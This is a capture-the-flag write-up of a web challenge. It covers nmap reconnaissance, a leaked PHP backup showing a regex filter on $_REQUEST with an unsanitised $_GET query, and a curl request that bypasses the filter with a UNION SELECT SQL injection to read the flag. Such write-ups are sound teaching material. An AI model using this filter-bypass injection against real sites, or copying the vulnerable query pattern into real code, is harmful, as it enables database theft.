It’s too late for me to submit the flag..lol!
So the challenge is:
So I heard you're hacker. I setup Super Next Gen. AumWAF to protect my l33t website.
Please hack my website.Thanked!
http://supernext-gen-aumwaf.wargames.my/
Webpage:

sql.php page:

As expected, any sql injection attempt will return error message as below:

Nmap result: Noticed that “/*.bak” in robots.txt
1 2 3 4 5 6 7 8 9 10 11 12 |
root@kali:~/Desktop/htb/olympus# nmap -sS -sC supernext-gen-aumwaf.wargames.my -p 80 Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-08 04:17 EDT Nmap scan report for supernext-gen-aumwaf.wargames.my (128.199.161.191) Host is up (0.0041s latency). PORT STATE SERVICE 80/tcp open http | http-robots.txt: 4 disallowed entries |_/ /aumwaf.php /flag.php /*.bak |_http-title: Protected by Next-Gen AumWAF Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds |
Let’s try to see if there is a backup file exist: sql.php.bak -> Yes!! it does exist!!

PHP file source code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
<?php if( isset($_REQUEST['id']) ) { if(preg_match("/'?(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){ die("Your request has been blocked by AumWAF"); } $sql = $mysqli->query('SELECT * FROM tbl_hackme WHERE id = ' . $_GET['id']); if($mysqli->error) { echo($mysqli->error); } else { $data = $sql->fetch_object(); echo $data->col1; } } ?> |
First, I noticed $_REQUEST[‘id’] was sent to filter, but $_GET[‘id’] was sent to the a function. After some research I learnt that $_REQUEST gets values from $_GET, $_POST, $_COOKIE respectively. This is the default order defined in php.ini file and can be changed. [seriously i copy this info from somewhere]
The idea is changing request from GET to POST while keeping the GET parameters in the url. Since $_POST[‘id’] will overwrite $_REQUEST[‘id’] and our $_GET[‘id’] parameter will become free from the filter.
So, to get the flag (+ hint was provided):
1 2 3 4 5 6 7 8 9 10 11 |
root@kali:~/Desktop/CTF/wgmy-nano# curl -d "id=dummy" "http://supernext-gen-aumwaf.wargames.my/sql.php?id=1+and+1=2+union+select+1,flag,3+from+tbl_flag" <style type="text/css"> body { display: block; font-family: consolas !important; white-space: pre; font-size: 12px; margin: 1em 0px; } </style> |
1 |
wgmy{aumwaf_1z_th3_b3st_w4f} |
Flag: wgmy{aumwaf_1z_th3_b3st_w4f}
Credit:
1. https://www.pwndiary.com/write-ups/sec-t-ctf-2017-naughty-ads-write-up-web200/
2. Ramadhan -> improvised my curl request.